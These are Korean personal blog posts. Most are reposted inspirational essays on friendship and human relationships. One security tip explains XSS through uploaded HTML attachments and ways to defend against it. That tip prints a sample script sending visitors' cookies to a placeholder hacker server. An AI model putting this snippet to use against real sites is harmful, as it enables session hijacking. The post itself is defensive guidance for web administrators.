좋은글 [펌]2014. 7. 25. 08:42

작은 만남과 큰 만남 



커다란 만남은 작고 

작은 만남은 크다. 


우리는 자신도 모르게 

커다란 만남을 추구하고 있습니다. 


그러나 진정으로 

자신의 인생을 바꾸는 만남은 

작고 사소한 만남입니다. 


사실은 엄청난 만남이지만 

그 당시에는...... 

깨닫지 못하기 때문에 

작게 보이는 것이지요. 


우리는 자신도 모르게 

작은 만남들을 쉽게 흘려 보냅니다. 


커다란 만남만을 추구하면 

그 만남을 살리지 못할 뿐만 아니라 

지금은 작지만 

장래에 크게 될 만남을 무시해 버리게 됩니다. 


만남에 의해 인생이 바뀝니다. 

만남에 의해 인생이 만들어져 갑니다. 


사랑도 마찬가지로 

누군가를 만나고 싶어 몸부림 칠수록 

멋진 만남은 이루어지기 어렵게 되는 것입니다. 


당장에 커다란 만남보다는 

지금은 작지만 장래에 크게될 

작은 만남을 소홀이 흘려버리는 

수는 하지 말아야 할 것입니다. 


중요한 것은 만나는 순간이 아닙니다. 

만나기 이전 그보다 만난 이후인 것입니다. 



- 좋은글 중에서 -

Posted by 네로
좋은글 [펌]2014. 7. 23. 22:29

두 손을 꼭 움켜쥐고 있다면

이젠 그 두 손을 활짝 펴십시오.

 

가진 것이 비록 작은 것이라도

그것이 꼭 필요한 사람이 있으면

나누어 주십시오.

이는 두 손을 가진 최소한의

역할이기 때문입니다.

 

두 눈이 꼭 나만을 위해 보았다면

이젠 그 두 눈으로 남도 보십시오.

 

보는 것이 비록 좁다 할지라도

도움이 꼭 필요한 사람을 본다면

찾아가서 도움을 주십시오.

이는 두 눈을 가지고 해야 할

임무이기 때문입니다.

 

두 귀로 꼭 달콤함만 들었다면

이젠 그 두 귀를 활짝 여십시오.

 

듣는 것이 비록 싫은 소리라도

그것이 꼭 필요한 사람이 있으면

들어주며 위로하여 주십시오.

 

이는 두 귀를 가지고 함께 할

조건이기 때문입니다.

 

입으로 늘 불평만 하였다면

이젠 그 입으로 감사하십시오.

 

받은 것이 비록 작다 해도 그것을

감사하는 사람과 손잡고 웃으면서

고마워하십시오.

이는 고운 입 가지고 살아갈

기준이기 때문입니다.

 

마음을 꼭 닫으면서 살았다면

이젠 그 마음의 문을 여십시오.

 

마음 씀이 비록 크지 않더라도

그것을 주변의 사람을 향하여

미소로서 대하며 사십시오.

이는 내가 사랑을 받고 나눠야 할

책임이기 때문입니다.

 

 

- "맑은 마음나누기" 중에서 -

Posted by 네로
좋은글 [펌]2014. 7. 22. 21:58

좋은 인간관계 를 맺기 위한 10계명


1. 먼저 인간이 되라.

좋은 인맥을 만들려 하기 전에 먼저 자신의 인간성부터 살펴라.

이해타산에 젖지 않았는지, 계산적인 만남에 물들지 않았는지 살펴보고 고쳐라.

유유상종이라 했으니 좋은 인간을 만나고 싶으면 너부터 먼저 좋은 인간이 되라.


2. 적을 만들지 말라. 친구는 성공을 가져오나,

적은 위 기를 가져오고 성공을 무너뜨린다. 조직이 무너지는 것은 3%의 반대 자 때문이며,

10명의 친구가 한 명의 적을 당하 지 못한다.

쓸데없이 남을 비난하지 말고, 항상 악연을 피하여 적이 생기지 않도록 하라.


3. 스승부터 찾아라.

인맥에는 지도자, 협력자, 추종자 가 있으며 가장 먼저 필요한 인맥은 지도자, 스승이다.

훌륭한 스승을 만나는 것은 인생에 있어 50% 이상을 성공한 것이나 다름없다.

유비도 삼고초려 했으니 좋은 스승 을 찾아 삼십고초려 하라.


4. 생명의 은인처럼 만나라.

만나는 사람마다 생명의 은인처럼 대하라. 항상 감사하고 어떻게 보답할 것인 지 고민하라.

그 사람으로 인하여 운명이 바뀌었 고, 또 앞으로도 바뀔 것이라 생각하고 대하라.

언젠가 그럴 순간이 생기면 기꺼이 너의 생명을 구해 줄 것이 다.


5. 첫사랑보다 강렬한 인상을 남겨라.

첫 만남에서는 첫사랑보다도 강렬 한 이미지를 남겨라.

길거리에서 발길에 차인 돌처럼 잊 혀지지 말고 애써 얻은 보석처럼 가슴에 남으라.


6. 헤어질 때 다시 만나고 싶은 사 람이 되라.

함께 있으면 즐거운 사람, 함께 하면 유익한 사람이 되라.

든 사람, 난 사람, 된 사람, 그도 아니면 웃기는 사람이라도 되라.


7. 하루에 3번 참고, 3번 웃고, 3번 칭찬하라.

참을 인자 셋이면 살인도 면한다.

미소는 가장 아름다운 이미지 메이 킹이며 칭찬은 고래도 춤추게 한다.

3번에 10배라도 참고, 웃고, 칭찬 하라.


8. 내 일처럼 기뻐하고, 내 일처럼 슬퍼하라.

애경사가 생기면 진심으로 함께 기뻐하고 함께 슬퍼 하라.

네 일이 내 일 같아야 내 일도 네 일 같다.


9. Give & Give & Forget 하라.

먼저 주고, 조건 없이 주고, 더 많이 주고, 그리고 모두 잊어버려라.

Give & Take 하지 마라. 받을 거 생각하고 주면 정 떨어진다.


10. 한 번 인맥은 영원한 인맥으로 만나라.

잘 나간다고 가까이 하고, 어렵다 고 멀리 하지 마라.

한 번 인맥으로 만났으면 영원한 인맥으로 만나라.

100년을 넘어서 대를 이어서 만나라.


- 좋은 글 중에서 -

Posted by 네로
Tip&Tech2014. 7. 22. 07:21

게시판에 글을 쓸 때 <script> 태그나 onclick 속성 등을 사용하여 

임의의 자바스크립트를 실행시키도록 하는 XSS 공격에 대해서는 다들 한번씩 들어보셨겠지요? 

그래서 대부분의 솔루션들이 <script> 태그와 각종 이벤트 속성들을 필터링하는 기능을 내장하고 있고요. 

참고: http://www.phpschool.com/link/tipntech/77221 


그러나 게시물 내용에서 <script> 태그 등을 필터링한다고 XSS 취약점이 완전 봉쇄되지는 않습니다. 

게시물 내용 외에도 XSS 공격에 사용될 수 있는 것이 하나 더 있거든요. 

바로 첨부파일입니다. 


만약 아래와 같은 내용을 만들어 test.html이라는 파일명으로 업로드한다면? 


    <html> 

    <head> 

        <title>메롱</title> 

    </head> 

    <body> 

        <script type="text/javascript"> 

            var img = document.createElement("img"); 

            img.src = "http://해커서버/lolcat.jpg?cookie=" + document.cookie; 

        </script> 

        <p>너의 쿠키는 내가 접수했다. 음하하하!</p> 

    </body> 

    </html> 


해당 첨부파일을 클릭하면 위의 웹페이지가 표시되면서 여러분의 쿠키는 해커의 서버로 죄다 전송되겠죠? 

게시물 내용을 필터링하는 솔루션은 많지만, 첨부파일 내용까지 필터링하지는 않으니까요. 


이런 문제를 막는 방법에는 몇 가지가 있습니다. 


1. GIF, JPG, PNG, BMP 등의 이미지파일 외에는 업로드 금지하는 방법이 가장 쉽죠. 

    만약 게시판에 이런 기능이 있고 제대로 사용중이시라면 일단 한숨 놓으셔도 됩니다. 

    그러나 만약 똑똑한 해커가 위의 내용과 같은 HTML 문서를 확장자만 GIF로 바꿔서 업로드한다면? 

    GIF 포맷의 특성상, 이렇게 변조된 파일도 정상적인 이미지처럼 보일 수 있습니다. 

    게다가 익스플로러 일부 버전은 파일 확장자가 아니라 내용을 직접 뜯어보고 화면 표시 방법을 결정하는 

    이상한 습관이 있어요. 따라서 이미지파일만 허용한다고 문제가 해결되지는 않습니다. 


2. 업로드 폴더의 .htaccess에 아래의 내용을 추가합니다. 

    이렇게 하면 이미지파일, HTML 문서 등 평소에는 브라우저에서 그대로 표시하는 파일들도 

    그냥 강제로 다운로드 창을 띄워버립니다. (단, <img> 태그로 불러온 경우에는 멀쩡하게 표시돼요.) 

    일단 사용자의 PC로 다운로드된 파일은 더이상 쿠키에 접근할 수 없으므로 XSS 공격은 무용지물이 됩니다. 


    <IfModule mod_headers.c> 

        Header set Content-Disposition attachment 

    </IfModule> 


    아파치의 <FilesMatch> 기능을 사용하면 특정 확장자만 저렇게 처리하도록 할 수도 있지만, 

    위에서 말씀드렸듯이 확장자만으로 필터링하는 것은 안전하지 않습니다. 

    따라서 업로드 폴더내의 모든 파일에 일괄 적용하는 것을 권장합니다. 


3. 가장 확실한 방법은 첨부파일을 다운로드할 때 별도의 도메인을 사용하도록 하는 방법입니다. 

    다른 도메인끼리는 서로의 쿠키에 접근할 수 없으니까요. 

    예를 들어 구글 사용자들이 업로드한 파일은 엄청난 양의 쿠키를 보유한 google.com 도메인이 아니라 

    googleusercontent.com이라는 별도의 도메인에서 다운로드하도록 되어 있습니다. 

    단, 서브도메인이 아니라 이렇게 완전히 다른 도메인을 쓰셔야 합니다. 

    설정에 따라 서브도메인끼리는 쿠키가 공유되기도 하거든요. 

    그래서 도메인 하나만 쓰시는 웹사이트라면 좀 부담스러운 방법입니다. 


4. 반드시 같은 도메인에서 HTML 파일을 직접 표시해야 하는 희귀한 경우라면 (실제로 이런 경우가 있음? 뭥미?) 

    <script>를 비롯한 여러가지 태그 및 속성 필터링 기능을 첨부파일에도 반드시 적용하셔야 합니다. 

    이건 완전 캐삽질이므로 정말 미쳐보고 싶은 분들만 해보세요. 

    단, 멀쩡한 이미지파일이나 압축파일까지 필터링을 시도할 경우 파일이 깨지는 수가 있으므로 주의. 


※ 업로드 폴더에서 PHP 웹쉘 실행을 봉쇄하는 기능과 함께 사용하시면 더욱 좋습니다. 

    http://www.phpschool.com/link/tipntech/77681 


내 서버에 다른 사람이 파일을 업로드할 수 있도록 허용한다는 건 이래저래 매우 위험한 일입니다. 

평소에는 별다른 해를 끼치지 않는 파일 형식이라도 서버 환경에서는 갑자기 실행파일로 돌변할 수 있거든요. 

따라서 업로드는 반드시 한 군데에 모아놓고 (폴더 탈출을 막기 위해 꼭 basename 함수를 사용하세요.) 

.htaccess를 사용하여 해당 폴더에 여러가지 제한을 걸어놓는 것이 안전합니다.


출처 : http://www.phpschool.com/link/tipntech/78863


Posted by 네로
좋은글 [펌]2014. 7. 5. 06:01

우리 서로 바라보고픈 사람이 되자.


 

우리가 삶에 지쳤을 때나 무너지고 싶을 때

말없이 마주보는 것만으로도 서로 마음 든든한 사람이 되고

 

때때로 힘겨운 인생의 무게로 인하여 속마음마저 막막할 때

우리 서로 위안이 되는 그런 사람이 되자.

 

누군가 사랑에는 조건이 따른다지만

우리의 바람은 지극히 작은 것이게 하고

그리하여 더 주고 덜 받음에 섭섭해 말며

 

문득문득 스치고 지나가는 먼 회상 속에서도

우리 서로 기억마다 반가운 사람이 되자.

 

어느 날 불현듯 지쳐 쓰러 질 것만 같은 시간에

우리 서로 마음 기댈 수 있는 사람이 되고


혼자 견디기엔 한 슬픔이 너무 클 때

언제고 부르면 달려올 수 있는 사람이 되자.

 

자리에 오랜 약속으로 머물며,

기다리며 더없이 간절한 그리움으로

눈 저리도록 바라보고픈 사람......

 

우리 서로 끝없이 기쁜 사람이 되자.

 

 

- 좋은 글 중에서 -

Posted by 네로
좋은글 [펌]2014. 7. 1. 22:30

나눔이 있어 좋은 친구

 

 

서로 사랑할 수 있는 것이 친구입니다.

서로 충고해줄 수 있는 것이 친구입니다.

 

서로 이해해줄 수 있는 것이 친구입니다.

서로 잘못이 있으면 덮어줄 수 있는 것이 친구입니다.

 

서로 미워하면서도 생각해줄 수 있는 것이 친구입니다

서로 허물없이 바라볼 수 있는 것이 친구입니다.

 

서로 울어줄 수 있는 것이 친구입니다.

다른 사람과 같이 있으면 질투 나는 것이 친구입니다.

 

뒤돌아 흉보아도 예뻐 보이는 것이 친구입니다.

가까이 할 수 없을 때 답답함을 느끼는 것이 친구입니다.

 

한 팔로 안을 수 있는 것이 친구입니다.

떨어져 있을 때 허전함을 느끼는 것이 친구입니다.

 

나의 소중한 모든 것을 주고 싶은 것이 친구입니다.

아픔을 반으로 기쁨을 두 배로 나누는 것이 친구입니다.

 

이유 없이 눈물을 머금게 되는 것이 친구입니다.

싸우면 둘 다 마음이 아픈 것이 친구입니다.

 

나보다 우리를 먼저 생각하는 것이 친구입니다.

기쁜 소식을 먼저 알리고 싶은 것이 친구입니다.

 

눈을 감아도 보이며 서로를 의지하는 것이 친구입니다.

믿음으로 쌓여 이뤄지는 것이 친구입니다.

 

친구로서, 친구답게 대하는 친구가 진정한 친구입니다.

지금 이글을 읽고 있는 당신이 소중한 친구입니다



- 좋은 글 중에서 -

Posted by 네로